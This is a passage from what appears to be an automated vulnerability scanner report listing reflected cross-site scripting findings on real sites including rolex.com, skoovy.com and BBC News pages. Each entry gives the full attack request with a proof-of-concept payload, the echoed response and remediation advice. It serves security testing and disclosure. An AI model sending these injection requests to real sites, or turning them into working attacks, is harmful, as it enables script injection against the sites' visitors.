User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache,max-age=0,must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Date: Thu, 16 Dec 2010 19:34:28 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ViewRolex3=Flash; expires=Thu, 16-Jun-2011 19:50:23 GMT; path=/
Set-Cookie: RolexSiteID=4; expires=Wed, 16-Dec-2020 19:50:23 GMT; path=/
Set-Cookie: ASP.NET_SessionId=1b0xbd45d5ywqw55kruke4b3; path=/; HttpOnly
Set-Cookie: GeoLoc=234/3992/26564; expires=Wed, 16-Feb-2011 19:50:24 GMT; path=/
Content-Length: 39589


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head><meta name=
...[SNIP]...
<a class="zh-Hans" href="~/zh-Hans/home?2c535"style="x:expression(alert(1))"49c6d6c27fa=1" alt="............" >
...[SNIP]...

2.92. http://www.rolex.com/en/home [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rolex.com
Path:   /en/home

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 57090'%3balert(1)//f20232ad2a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 57090';alert(1)//f20232ad2a0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en/home?57090'%3balert(1)//f20232ad2a0=1 HTTP/1.1
Host: www.rolex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache,max-age=0,must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Date: Thu, 16 Dec 2010 19:34:29 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ViewRolex3=Flash; expires=Thu, 16-Jun-2011 19:50:25 GMT; path=/
Set-Cookie: RolexSiteID=4; expires=Wed, 16-Dec-2020 19:50:25 GMT; path=/
Set-Cookie: ASP.NET_SessionId=4rlzm0ibk4ct5a45n0zqygfa; path=/; HttpOnly
Set-Cookie: GeoLoc=234/3992/26564; expires=Wed, 16-Feb-2011 19:50:26 GMT; path=/
Content-Length: 39329


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head><meta name=
...[SNIP]...
<a href="/en/home?57090';alert(1)//f20232ad2a0=1&view=f">
...[SNIP]...

2.93. http://www.rolex.com/en/rolex-watches/women-lady-datejust-pearlmaster/introduction [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rolex.com
Path:   /en/rolex-watches/women-lady-datejust-pearlmaster/introduction

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15a90"style%3d"x%3aexpression(alert(1))"63d00b95e30 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 15a90"style="x:expression(alert(1))"63d00b95e30 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /en/rolex-watches/women-lady-datejust-pearlmaster/introduction?15a90"style%3d"x%3aexpression(alert(1))"63d00b95e30=1 HTTP/1.1
Host: www.rolex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache,max-age=0,must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Date: Thu, 16 Dec 2010 19:34:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ViewRolex3=Flash; expires=Thu, 16-Jun-2011 19:50:18 GMT; path=/
Set-Cookie: RolexSiteID=4; expires=Wed, 16-Dec-2020 19:50:18 GMT; path=/
Set-Cookie: ASP.NET_SessionId=cvwrqhbw3hb11y45pl0jk2ml; path=/; HttpOnly
Content-Length: 41179


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head><meta name=
...[SNIP]...
<a class="zh-Hans" href="~/zh-Hans/rolex-watches/women-lady-datejust-pearlmaster/introduction?15a90"style="x:expression(alert(1))"63d00b95e30=1" alt="............" >
...[SNIP]...

2.94. http://www.rolex.com/en/rolex-watches/women-lady-datejust-pearlmaster/introduction [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rolex.com
Path:   /en/rolex-watches/women-lady-datejust-pearlmaster/introduction

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 11ec0-->3108b7297af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/rolex-watches/women-lady-datejust-pearlmaster/introduction?11ec0-->3108b7297af=1 HTTP/1.1
Host: www.rolex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache,max-age=0,must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Date: Thu, 16 Dec 2010 19:34:23 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ViewRolex3=Flash; expires=Thu, 16-Jun-2011 19:50:19 GMT; path=/
Set-Cookie: RolexSiteID=4; expires=Wed, 16-Dec-2020 19:50:19 GMT; path=/
Set-Cookie: ASP.NET_SessionId=or2aeielacco0snervovuq45; path=/; HttpOnly
Content-Length: 40757


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head><meta name=
...[SNIP]...
<!-- WITBE: /en/rolex-watches/women-lady-datejust-pearlmaster/introduction?11ec0-->3108b7297af=1 -->
...[SNIP]...

2.95. http://www.rolex.com/en/rolex-watches/women-lady-datejust-pearlmaster/introduction [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rolex.com
Path:   /en/rolex-watches/women-lady-datejust-pearlmaster/introduction

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b12e2'%3balert(1)//b9d98f13540 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b12e2';alert(1)//b9d98f13540 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en/rolex-watches/women-lady-datejust-pearlmaster/introduction?b12e2'%3balert(1)//b9d98f13540=1 HTTP/1.1
Host: www.rolex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache,max-age=0,must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Date: Thu, 16 Dec 2010 19:34:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ViewRolex3=Flash; expires=Thu, 16-Jun-2011 19:50:19 GMT; path=/
Set-Cookie: RolexSiteID=4; expires=Wed, 16-Dec-2020 19:50:19 GMT; path=/
Set-Cookie: ASP.NET_SessionId=0ad023uezxt5fzjmzn2za555; path=/; HttpOnly
Content-Length: 40885


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head><meta name=
...[SNIP]...
<a href="/en/rolex-watches/women-lady-datejust-pearlmaster/introduction?b12e2';alert(1)//b9d98f13540=1&view=f">
...[SNIP]...

2.96. http://www.skoovy.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.skoovy.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 517cf"><script>alert(1)</script>8a7f8aaa627 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?517cf"><script>alert(1)</script>8a7f8aaa627=1 HTTP/1.1
Host: www.skoovy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/html; charset=UTF-8
Date: Thu, 16 Dec 2010 19:46:47 GMT
Connection: close
Set-Cookie: X-Mapping-jhoibjei=DC46D56084277958B248F90AC366BA83; path=/
Content-Length: 48563


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
...[SNIP]...
<a href="/published/page/2/517cf"><script>alert(1)</script>8a7f8aaa627/1">
...[SNIP]...

2.97. http://news.bbc.co.uk/2/hi/programmes/world_news_america/9283905.stm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /2/hi/programmes/world_news_america/9283905.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1955a'-alert(1)-'b49c7b5e110 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/hi/programmes/world_news_america/9283905.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=1955a'-alert(1)-'b49c7b5e110

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:35:12 GMT
Keep-Alive: timeout=10, max=732
Expires: Thu, 16 Dec 2010 19:35:12 GMT
Connection: close
Set-Cookie: BBC-UID=e48d50ba06395f006bc34f75e1b537d75f89d24f50b0b16a84cbfab5b4917cfc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:35:12 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=e48d50ba06395f006bc34f75e1b537d75f89d24f50b0b16a84cbfab5b4917cfc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:35:12 GMT; path=/; domain=bbc.co.uk;
Content-Length: 39674

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-GB" xmlns="http://www.w3.org/1999/xhtml" lang="en-GB">
<h
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292528112000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=1955a'-alert(1)-'b49c7b5e110',
       section: null,
       sectionPath: '/programmes/world_news_america',
       siteName: null,
       siteToServe: 'news',
       siteVersion: '4',
       storyId: '9283905',
       assetType: null,
       uri: '/2/hi/programm
...[SNIP]...

2.98. http://news.bbc.co.uk/2/hi/programmes/world_news_america/9283924.stm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /2/hi/programmes/world_news_america/9283924.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6fe5a'-alert(1)-'125128dc858 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/hi/programmes/world_news_america/9283924.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=6fe5a'-alert(1)-'125128dc858

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:35:11 GMT
Keep-Alive: timeout=10, max=733
Expires: Thu, 16 Dec 2010 19:35:11 GMT
Connection: close
Set-Cookie: BBC-UID=840dd0eaf6c92ebff0457a4bf1f0d98f4ebbe1cdb0b0718ad45baa054be19c0a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:35:11 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=840dd0eaf6c92ebff0457a4bf1f0d98f4ebbe1cdb0b0718ad45baa054be19c0a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:35:11 GMT; path=/; domain=bbc.co.uk;
Content-Length: 39263

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-GB" xmlns="http://www.w3.org/1999/xhtml" lang="en-GB">
<h
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292528111000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=6fe5a'-alert(1)-'125128dc858',
       section: null,
       sectionPath: '/programmes/world_news_america',
       siteName: null,
       siteToServe: 'news',
       siteVersion: '4',
       storyId: '9283924',
       assetType: null,
       uri: '/2/hi/programm
...[SNIP]...

2.99. http://news.bbc.co.uk/2/hi/programmes/world_news_america/9291805.stm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /2/hi/programmes/world_news_america/9291805.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6d615'-alert(1)-'d83ffeece1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/hi/programmes/world_news_america/9291805.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=6d615'-alert(1)-'d83ffeece1

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:35:12 GMT
Keep-Alive: timeout=10, max=761
Expires: Thu, 16 Dec 2010 19:35:12 GMT
Connection: close
Set-Cookie: BBC-UID=548d504a46693ff0bdbd6ed1013137a4fecb92af0080b1eab46b7a4472fc6baa0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:35:12 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=548d504a46693ff0bdbd6ed1013137a4fecb92af0080b1eab46b7a4472fc6baa0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:35:12 GMT; path=/; domain=bbc.co.uk;
Content-Length: 39611

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-GB" xmlns="http://www.w3.org/1999/xhtml" lang="en-GB">
<h
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292528112000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=6d615'-alert(1)-'d83ffeece1',
       section: null,
       sectionPath: '/programmes/world_news_america',
       siteName: null,
       siteToServe: 'news',
       siteVersion: '4',
       storyId: '9291805',
       assetType: null,
       uri: '/2/hi/programm
...[SNIP]...

2.100. http://news.bbc.co.uk/2/hi/programmes/world_news_america/default.stm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /2/hi/programmes/world_news_america/default.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 797e1'-alert(1)-'1f343713f38 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/hi/programmes/world_news_america/default.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=797e1'-alert(1)-'1f343713f38

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:35:20 GMT
Keep-Alive: timeout=10, max=742
Expires: Thu, 16 Dec 2010 19:35:20 GMT
Connection: close
Set-Cookie: BBC-UID=841df0fa26f94f08de2a4166b13e2589bbfefb58d0a001bae48b7ac5f291a5440Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:35:20 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=841df0fa26f94f08de2a4166b13e2589bbfefb58d0a001bae48b7ac5f291a5440Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:35:20 GMT; path=/; domain=bbc.co.uk;
Content-Length: 69811

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-GB" xmlns="http://www.w3.org/1999/xhtml" lang="en-GB">
<h
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292528120000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=797e1'-alert(1)-'1f343713f38',
       section: null,
       sectionPath: '/programmes/world_news_america',
       siteName: null,
       siteToServe: 'news',
       siteVersion: '4',
       storyId: '-',
       assetType: null,
       uri: '/2/hi/programmes/wor
...[SNIP]...

2.101. http://news.bbc.co.uk/2/hi/programmes/world_news_america/highlights/default.stm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /2/hi/programmes/world_news_america/highlights/default.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 745e5'-alert(1)-'c6289384f28 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/hi/programmes/world_news_america/highlights/default.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=745e5'-alert(1)-'c6289384f28

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:35:18 GMT
Keep-Alive: timeout=10, max=737
Expires: Thu, 16 Dec 2010 19:35:18 GMT
Connection: close
Set-Cookie: BBC-UID=34ad801a66f9ff160e99470611a0a8b5a49dc82f40f061192bbb73ceee3b0cce0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:35:18 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=34ad801a66f9ff160e99470611a0a8b5a49dc82f40f061192bbb73ceee3b0cce0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:35:18 GMT; path=/; domain=bbc.co.uk;
Content-Length: 62756

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-GB" xmlns="http://www.w3.org/1999/xhtml" lang="en-GB">
<h
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292528118000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=745e5'-alert(1)-'c6289384f28',
       section: null,
       sectionPath: '/programmes/world_news_america/highlights',
       siteName: null,
       siteToServe: 'news',
       siteVersion: '4',
       storyId: '-',
       assetType: null,
       uri: '/2/hi/pro
...[SNIP]...

2.102. http://news.bbc.co.uk/sport/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 364e8'-alert(1)-'f266e9b4776 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport/ HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=364e8'-alert(1)-'f266e9b4776

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:35:36 GMT
Keep-Alive: timeout=10, max=789
Expires: Thu, 16 Dec 2010 19:35:36 GMT
Connection: close
Set-Cookie: BBC-UID=e43d800a76fa20d87e296e2481a0a3e7bd13b0f7402071997bbb335ebe2b6cae0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:35:36 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=e43d800a76fa20d87e296e2481a0a3e7bd13b0f7402071997bbb335ebe2b6cae0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:35:36 GMT; path=/; domain=bbc.co.uk;
Content-Length: 87674

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-GB" xmlns="http://www.w3.org/1999/xhtml" lang="en-GB">
<h
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1292528136000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=364e8'-alert(1)-'f266e9b4776',
       section: null,
       sectionPath: '/',
       siteName: null,
       siteToServe: 'sport',
       siteVersion: '4',
       storyId: '-',
       assetType: null,
       uri: '/sport/',
       country: 'us',
       masthead: false,
...[SNIP]...

2.103. http://news.bbc.co.uk/sport1/hi/football/9295057.stm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport1/hi/football/9295057.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72c5f'-alert(1)-'73e98f3b849 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport1/hi/football/9295057.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.google.com/search?hl=en&q=72c5f'-alert(1)-'73e98f3b849

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Thu, 16 Dec 2010 19:35:59 GMT
Keep-Alive: timeout=10, max=732
Expires: Thu, 16 Dec 2010 19:35:59 GMT
Connection: close
Set-Cookie: BBC-UID=549de00a762a41cf7e1eca62115baf2b80dfb433b060a1a92bab930f338543120Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%3b%29; expires=Fri, 16-Dec-11 19:35:59 GMT; path=/; domain=bbc.co.uk;
